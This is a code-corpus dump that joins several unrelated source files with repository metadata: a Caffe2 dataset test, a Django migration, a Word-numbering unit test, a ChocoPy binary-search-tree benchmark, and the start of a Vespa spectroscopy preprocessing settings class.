[111, 112, 121, 122, 123, 124], # intlst
[1],
[11],
[1],
[111],
[11.1], # id score pairs
[123],
[[0.2, 0.8]],
['dog posts'], # metadata
),
(
[[2.1, 2.2, 2.3]], # dense
[2],
[21, 22],
[2.1, 2.2], # floats
[0],
[],
[],
[], # int list
[2],
[21, 22],
[1, 2],
[211, 221, 222],
[21.1, 22.1, 22.2],
[234],
[[0.5, 0.5]],
['friends who like to'], # metadata
),
(
[[3.1, 3.2, 3.3]], # dense
[3],
[31, 32, 33],
[3.1, 3.2, 3.3], # floats
[1],
[31],
[3],
[311, 312, 313], # int lst
[2],
[31, 32],
[2, 3],
[311, 312, 321, 322, 323],
[31.1, 31.2, 32.1, 32.2, 32.3], # id score list
[456],
[[0.7, 0.3]],
['posts about ca'], # metadata
),
# after the end of the dataset, we will keep getting empty vectors
([], ) * 16,
([], ) * 16,
]
entries = [from_blob_list(schema, e) for e in entries_raw]
"""
Let's go ahead and create the reading nets.
We will run `read` net multiple times and assert that we are reading the
entries the way we stated above.
"""
read_init_net = core.Net('read_init')
read_next_net = core.Net('read_next')
reader = ds.reader(read_init_net)
should_continue, batch = reader.read_record(read_next_net)
workspace.RunNetOnce(read_init_net)
workspace.CreateNet(read_next_net, True)
for entry in entries:
workspace.RunNet(str(read_next_net))
actual = FetchRecord(batch)
_assert_records_equal(actual, entry)
"""
5. Reading/writing in a single plan
If all operations on the data are expressible as Caffe2 operators,
we don't need to load the data into Python: we can iterate through the
dataset in a single Plan.
Here we will process the dataset a little and store it in a second
dataset. We can reuse the same Reader since it supports reset.
"""
reset_net = core.Net('reset_net')
reader.reset(reset_net)
read_step, batch = reader.execution_step()
""" We will add the line number * 1000 to the feature ids. """
process_net = core.Net('process')
line_no = Const(process_net, 0, dtype=np.int32)
const_one = Const(process_net, 1000, dtype=np.int32)
process_net.Add([line_no, const_one], [line_no])
field = batch.floats.keys.get()
process_net.Print(field, [])
process_net.Add([field, line_no], field, broadcast=1, axis=0)
""" Lets create a second dataset and append to it. """
ds2 = dataset.Dataset(schema, name='dataset2')
ds2.init_empty(reset_net)
writer = ds2.writer(reset_net)
writer.write_record(process_net, batch)
# commit is not necessary for DatasetWriter but will add it for
# generality of the example
commit_net = core.Net('commit')
writer.commit(commit_net)
""" Time to create and run a plan which will do the processing """
plan = core.Plan('process')
plan.AddStep(core.execution_step('reset', reset_net))
plan.AddStep(read_step.AddNet(process_net))
plan.AddStep(core.execution_step('commit', commit_net))
workspace.RunPlan(plan)
"""
Now we should have dataset2 populated.
"""
ds2_data = FetchRecord(ds2.content())
field = ds2_data.floats.keys
field.set(blob=field.get() - [1000, 2000, 2000, 3000, 3000, 3000])
_assert_records_equal(contents, ds2_data)
"""
6. Slicing a dataset
You can create a new schema from pieces of another schema and reuse
the same data.
"""
subschema = Struct(('top_level', schema.int_lists.values))
int_list_contents = contents.int_lists.values.field_names()
self.assertEquals(len(subschema.field_names()), len(int_list_contents))
"""
7. Random Access a dataset
"""
read_init_net = core.Net('read_init')
read_next_net = core.Net('read_next')
idx = np.array([2, 1, 0])
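# Read the records back in the order given by these indices (last record first).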
indices_blob = Const(read_init_net, idx, name='indices')
reader = ds.random_reader(read_init_net, indices_blob)
reader.computeoffset(read_init_net)
should_stop, batch = reader.read_record(read_next_net)
workspace.CreateNet(read_init_net, True)
workspace.RunNetOnce(read_init_net)
workspace.CreateNet(read_next_net, True)
for i in range(len(entries)):
k = idx[i] if i in idx else i
entry = entries[k]
workspace.RunNet(str(read_next_net))
actual = FetchRecord(batch)
_assert_records_equal(actual, entry)
workspace.RunNet(str(read_next_net))
self.assertEquals(True, workspace.FetchBlob(should_stop))
"""
8. Random Access a dataset with loop_over = true
"""
read_init_net = core.Net('read_init')
read_next_net = core.Net('read_next')
idx = np.array([2, 1, 0])
indices_blob = Const(read_init_net, idx, name='indices')
reader = ds.random_reader(read_init_net, indices_blob, loop_over=True)
reader.computeoffset(read_init_net)
should_stop, batch = reader.read_record(read_next_net)
workspace.CreateNet(read_init_net, True)
workspace.RunNetOnce(read_init_net)
workspace.CreateNet(read_next_net, True)
for _ in range(len(entries) * 3):
workspace.RunNet(str(read_next_net))
self.assertEquals(False, workspace.FetchBlob(should_stop))
"""
9. Sort and shuffle a dataset
This sorts the dataset using the score of a certain column,
then shuffles within each chunk of size batch_size * shuffle_size
before shuffling the chunks.
"""
read_init_net = core.Net('read_init')
read_next_net = core.Net('read_next')
reader = ds.random_reader(read_init_net)
reader.sort_and_shuffle(read_init_net, 'int_lists:lengths', 1, 2)
reader.computeoffset(read_init_net)
should_continue, batch = reader.read_record(read_next_net)
workspace.CreateNet(read_init_net, True)
workspace.RunNetOnce(read_init_net)
workspace.CreateNet(read_next_net, True)
expected_idx = np.array([2, 1, 0])
for i in range(len(entries)):
k = expected_idx[i] if i in expected_idx else i
entry = entries[k]
workspace.RunNet(str(read_next_net))
actual = FetchRecord(batch)
_assert_records_equal(actual, entry)
def test_last_n_window_ops(self):
collect_net = core.Net('collect_net')
collect_net.GivenTensorFill(
[],
'input',
shape=[3, 2],
values=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0],
)
input_array =\
np.array(list(range(1, 7)), dtype=np.float32).reshape(3, 2)
workspace.CreateBlob('output')
workspace.FeedBlob('next', np.array(0, dtype=np.int32))
collect_net.LastNWindowCollector(
['output', 'next', 'input'],
['output', 'next'],
num_to_collect=7,
)
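# Only the last num_to_collect rows are kept; once more rows than that have
# been seen, the window wraps and overwrites the oldest entries, which is
# what the wrapped orderings asserted below reflect.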
plan = core.Plan('collect_data')
plan.AddStep(
core.execution_step('collect_data', [collect_net],
num_iter=1)
)
workspace.RunPlan(plan)
reference_result = workspace.FetchBlob('output')
npt.assert_array_equal(input_array, reference_result)
plan = core.Plan('collect_data')
plan.AddStep(
core.execution_step('collect_data', [collect_net],
num_iter=2)
)
workspace.RunPlan(plan)
reference_result = workspace.FetchBlob('output')
npt.assert_array_equal(input_array[[1, 2, 2, 0, 1, 2, 0]],
reference_result)
plan = core.Plan('collect_data')
plan.AddStep(
core.execution_step('collect_data', [collect_net],
num_iter=3)
)
workspace.RunPlan(plan)
reference_result = workspace.FetchBlob('output')
npt.assert_array_equal(input_array[[2, 0, 1, 2, 2, 0, 1]],
reference_result)
def test_collect_tensor_ops(self):
init_net = core.Net('init_net')
blobs = ['blob_1', 'blob_2', 'blob_3']
bvec_map = {}
ONE = init_net.ConstantFill([], 'ONE', shape=[1, 2], value=1)
for b in blobs:
init_net.ConstantFill([], [b], shape=[1, 2], value=0)
bvec_map[b] = b + '_vec'
init_net.CreateTensorVector([], [bvec_map[b]])
reader_net = core.Net('reader_net')
for b in blobs:
reader_net.Add([b, ONE], [b])
collect_net = core.Net('collect_net')
num_to_collect = 1000
max_example_to_cover = 100000
bvec = [bvec_map[b] for b in blobs]
collect_net.CollectTensor(
bvec + blobs,
bvec,
num_to_collect=num_to_collect,
)
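# Keep at most num_to_collect examples out of up to max_example_to_cover
# seen; the histogram check below verifies the kept samples cover the whole
# range roughly uniformly.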
print('Collect Net Proto: {}'.format(collect_net.Proto()))
plan = core.Plan('collect_data')
plan.AddStep(core.execution_step('collect_init', init_net))
plan.AddStep(
core.execution_step(
'collect_data', [reader_net, collect_net],
num_iter=max_example_to_cover
)
)
workspace.RunPlan(plan)
# concat the collected tensors
concat_net = core.Net('concat_net')
bconcated_map = {}
bsize_map = {}
for b in blobs:
bconcated_map[b] = b + '_concated'
bsize_map[b] = b + '_size'
concat_net.ConcatTensorVector([bvec_map[b]], [bconcated_map[b]])
concat_net.TensorVectorSize([bvec_map[b]], [bsize_map[b]])
workspace.RunNetOnce(concat_net)
# check data
reference_result = workspace.FetchBlob(bconcated_map[blobs[0]])
self.assertEqual(
reference_result.shape,
(min(num_to_collect, max_example_to_cover), 2)
)
size = workspace.FetchBlob(bsize_map[blobs[0]])
self.assertEqual(tuple(), size.shape)
self.assertEqual(min(num_to_collect, max_example_to_cover), size.item())
hist, _ = np.histogram(
reference_result[:, 0],
bins=10,
range=(1, max_example_to_cover)
)
print('Sample histogram: {}'.format(hist))
self.assertTrue(all(hist > 0.6 * (num_to_collect / 10)))
for i in range(1, len(blobs)):
result = workspace.FetchBlob(bconcated_map[blobs[i]])
self.assertEqual(reference_result.tolist(), result.tolist())
if __name__ == "__main__":
import unittest
unittest.main()
| [
"[email protected]"
]
| |
3a0aa4f6f46d50f9055d2000d1b39488f5c19f87 | b341a8d120737297aa8fd394a23633dac9b5ccda | /accounts/migrations/0007_auto_20210122_1129.py | c7476e71ff6f0746f30db617c468bd59bbe23d1c | []
| no_license | Minari766/disney_side_stories | 16d97cb02bf00aa5439d59f753abb9a4706a30aa | aa2d88b1b0fdd87a27f41318bd3ec7352229b6ff | refs/heads/main | 2023-08-15T07:03:16.922579 | 2021-10-03T07:47:22 | 2021-10-03T07:47:22 | 306,496,250 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py | # Generated by Django 2.2 on 2021-01-22 02:29
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0006_auto_20210122_0127'),
]
operations = [
migrations.AlterField(
model_name='customuser',
name='icon',
field=models.ImageField(blank=True, null=True, upload_to='images', verbose_name='アイコン'),
),
]
| [
"[email protected]"
]
| |
436645c364f840999119d1e57184125dbceeca14 | 1f006f0c7871fcde10986c4f5cec916f545afc9f | /apps/ice/plugins/oxml/oxml_wordNumbering_test.py | 9d73299a89601ac0dd3e3d023fcdc93ea3e7a208 | []
| no_license | ptsefton/integrated-content-environment | 248b8cd29b29e8989ec1a154dd373814742a38c1 | c1d6b5a1bea3df4dde10cb582fb0da361dd747bc | refs/heads/master | 2021-01-10T04:46:09.319989 | 2011-05-05T01:42:52 | 2011-05-05T01:42:52 | 36,273,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,070 | py | #!/usr/bin/env python
#
# Copyright (C) 2010 Distance and e-Learning Centre,
# University of Southern Queensland
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
from unittest import TestCase
import sys
from oxml_wordNumbering import WordNumbering
testFile = "testData/numbering.xml"
class WordNumberingTest(TestCase):
def setUp(self):
f = open(testFile, "rb")
self.wordNumberingXmlStr = f.read()
f.close()
def tearDown(self):
pass
def testGetNumLevelInfo(self):
#word/numbering.xml
wordNum = WordNumbering(self.wordNumberingXmlStr)
numId = "1"
level = "0"
info = wordNum.getNumLevelInfo(numId, level)
expected = {'leftIndent': u'720', 'start': u'1', 'jc': u'left',
'text': u'%1.', 'format': u'decimal'}
self.assertEquals(info, expected)
def runUnitTests(locals):
print "\n\n\n\n"
if sys.platform=="cli":
import clr
import System.Console
System.Console.Clear()
print "---- Testing under IronPython ----"
else:
print "---- Testing ----"
# Run only the selected tests
args = list(sys.argv)
sys.argv = sys.argv[:1]
args.pop(0)
runTests = args
runTests = [ i.lower().strip(", ") for i in runTests]
runTests = ["test"+i for i in runTests if not i.startswith("test")] + \
[i for i in runTests if i.startswith("test")]
if runTests!=[]:
testClasses = [i for i in locals.values() \
if hasattr(i, "__bases__") and \
(TestCase in i.__bases__)]
testing = []
for x in testClasses:
l = dir(x)
l = [ i for i in l if i.startswith("test") and callable(getattr(x, i))]
for i in l:
if i.lower() not in runTests:
delattr(x, i)
else:
testing.append(i)
x = None
num = len(testing)
if num<1:
print "No selected tests found! - %s" % str(args)[1:-1]
elif num==1:
print "Running selected test - %s" % (str(testing)[1:-1])
else:
print "Running %s selected tests - %s" % (num, str(testing)[1:-1])
from unittest import main
main()
if __name__=="__main__":
runUnitTests(locals())
sys.exit(0)
| [
"[email protected]@110e3293-9ef9-cb8f-f479-66bdb1942d05"
]
| [email protected]@110e3293-9ef9-cb8f-f479-66bdb1942d05 |
199d434465c3656aee4f794b9c3e45082973e134 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/synthetic/tree-big-7896.py | b9db85cffe8ae7ce8835bf3307e75b65eb9792ec | []
| no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,291 | py | # Binary-search trees
class TreeNode(object):
value:int = 0
left:"TreeNode" = None
right:"TreeNode" = None
def insert(self:"TreeNode", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode(x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode(x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode2(object):
value:int = 0
value2:int = 0
left:"TreeNode2" = None
left2:"TreeNode2" = None
right:"TreeNode2" = None
right2:"TreeNode2" = None
def insert(self:"TreeNode2", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode2(x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode2(x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode2", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode2(x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode2(x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode2", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode2", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode3(object):
value:int = 0
value2:int = 0
value3:int = 0
left:"TreeNode3" = None
left2:"TreeNode3" = None
left3:"TreeNode3" = None
right:"TreeNode3" = None
right2:"TreeNode3" = None
right3:"TreeNode3" = None
def insert(self:"TreeNode3", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode3", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode3", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode3", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode4(object):
value:int = 0
value2:int = 0
value3:int = 0
value4:int = 0
left:"TreeNode4" = None
left2:"TreeNode4" = None
left3:"TreeNode4" = None
left4:"TreeNode4" = None
right:"TreeNode4" = None
right2:"TreeNode4" = None
right3:"TreeNode4" = None
right4:"TreeNode4" = None
def insert(self:"TreeNode4", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode4", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode4", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode4", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode5(object):
value:int = 0
value2:int = 0
value3:int = 0
value4:int = 0
value5:int = 0
left:"TreeNode5" = None
left2:"TreeNode5" = None
left3:"TreeNode5" = None
left4:"TreeNode5" = None
left5:"TreeNode5" = None
right:"TreeNode5" = None
right2:"TreeNode5" = None
right3:"TreeNode5" = None
right4:"TreeNode5" = None
right5:"TreeNode5" = None
def insert(self:"TreeNode5", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode5", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode5", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode5", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class Tree(object):
root:TreeNode = None
size:int = 0
def insert(self:"Tree", x:int) -> object:
if self.root is None:
self.root = makeNode(x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree2(object):
root:TreeNode2 = None
root2:TreeNode2 = None
size:int = 0
size2:int = 0
def insert(self:"Tree2", x:int) -> object:
if self.root is None:
self.root = makeNode2(x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree2", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode2(x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree2", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree2", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree3(object):
root:TreeNode3 = None
root2:TreeNode3 = None
root3:TreeNode3 = None
size:int = 0
size2:int = 0
size3:int = 0
def insert(self:"Tree3", x:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree3", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree3", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree3", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree3", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree3", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree4(object):
root:TreeNode4 = None
root2:TreeNode4 = None
root3:TreeNode4 = None
root4:TreeNode4 = None
size:int = 0
size2:int = 0
size3:int = 0
size4:int = 0
def insert(self:"Tree4", x:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree4", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree4", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree4", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree4", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree4", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree5(object):
root:TreeNode5 = None
root2:TreeNode5 = None
root3:TreeNode5 = None
root4:TreeNode5 = None
root5:TreeNode5 = None
size:int = 0
size2:int = 0
size3:int = 0
size4:int = 0
size5:int = 0
def insert(self:"Tree5", x:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree5", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree5", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree5", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree5", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree5", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def makeNode(x: int) -> TreeNode:
b:TreeNode = None
b = TreeNode()
b.value = x
return b
def makeNode2(x: int, x2: int) -> TreeNode2:
b:TreeNode2 = None
b2:TreeNode2 = None
b = TreeNode2()
b.value = x
return b
def makeNode3(x: int, x2: int, x3: int) -> TreeNode3:
b:TreeNode3 = None
b2:TreeNode3 = None
b3:TreeNode3 = None
b = TreeNode3()
b.value = x
return b
def makeNode4(x: int, x2: int, x3: int, x4: int) -> TreeNode4:
b:TreeNode4 = None
b2:TreeNode4 = None
b3:TreeNode4 = None
b4:TreeNode4 = None
b = TreeNode4()
b.value = x
return b
def makeNode5(x: int, x2: int, x3: int, x4: int, x5: int) -> TreeNode5:
b:TreeNode5 = None
b2:TreeNode5 = None
b3:TreeNode5 = None
b4:TreeNode5 = None
b5:TreeNode5 = None
b = TreeNode5()
b.value = x
return b
# Input parameters
n:int = 100
n2:int = 100
n3:int = 100
n4:int = 100
n5:int = 100
c:int = 4
c2:int = 4
c3:int = 4
c4:int = 4
c5:int = 4
# Data
t:Tree = None
t2:Tree = None
t3:Tree = None
t4:Tree = None
t5:Tree = None
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
k:int = 37813
k2:int = 37813
k3:int = 37813
k4:int = 37813
k5:int = 37813
# Crunch
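# Insert a pseudo-random key sequence (k = k * 37813 mod 37831) plus most
# small sequential keys, then report the tree size and membership of a few
# probe values.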
t = Tree()
while i < n:
t.insert(k)
k = (k * 37813) % 37831
if i % c != 0:
t.insert(i)
i = i + 1
print(t.size)
for i in [4, 8, 15, 16, 23, 42]:
if t.contains(i):
print(i)
| [
"[email protected]"
]
| |
bd64520533edfc4080a9c62fe2f73533c225df98 | 952a9bc5a54bae037662f3bd5e09aa13780628a2 | /vespa/analysis/block_prep_megalaser.py | d9ee800348907f04ad9ee6a673913aebdecb9e0a | [
"BSD-3-Clause"
]
| permissive | bsoher/vespa_py2 | 199964d2ffdc6ed576d6d73e55078ed5bc26c784 | 07cd67de2465607319870a18435da784345198d0 | refs/heads/main | 2023-04-22T04:24:44.270731 | 2021-05-06T01:07:57 | 2021-05-06T01:07:57 | 364,384,405 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,109 | py | # Python modules
from __future__ import division
# 3rd party modules
import numpy as np
import xml.etree.cElementTree as ElementTree
# Our modules
import vespa.analysis.block_prep_identity as block_prep_identity
import vespa.analysis.chain_prep_megalaser as chain_prep_megalaser
import vespa.analysis.block as block
import vespa.common.util.xml_ as util_xml
import vespa.common.util.misc as util_misc
import vespa.common.constants as common_constants
import vespa.common.mrs_data_raw as mrs_data_raw
from vespa.common.constants import Deflate
class _Settings(object):
# The XML_VERSION enables us to change the XML output format in the future
XML_VERSION = "1.0.0"
def __init__(self, attributes=None):
"""
Currently there are no input parameters set in this object. This may
change in the future, or this object may serve as a base class for
other "raw" types of data objects that need to do a bit of massaging
of the data as it comes in (e.g. align and sum individual FIDs for
an SVS data set).
"""
self.fid_left_shift = 0
self.gaussian_apodization = 2.0
self.global_phase1 = 0.0
self.apply_peak_shift = True
self.reference_peak_center = 2.01
self.peak_search_width = 0.2
self.fid_left_shift_b0 = 56
self.apply_phase0 = True
self.phase0_range_start = 2.2
self.phase0_range_end = 1.8
self.fid_left_shift_phase0 = 56
self.ref_spectrum_source = 'singlet_centered_in_range'
self.ref_peak_line_width = 18
self.constant_phase0_offset = 70 # degrees
if attributes is not None:
self.inflate(attributes)
def __str__(self):
return self.__unicode__().encode("utf-8")
def __unicode__(self):
lines = [ ]
lines.append("--- Block Preprocess Megalaser Settings ---")
lines.append("fid_left_shift : " + unicode(self.fid_left_shift))
lines.append("gaussian_apodization : " + unicode(self.gaussian_apodization))
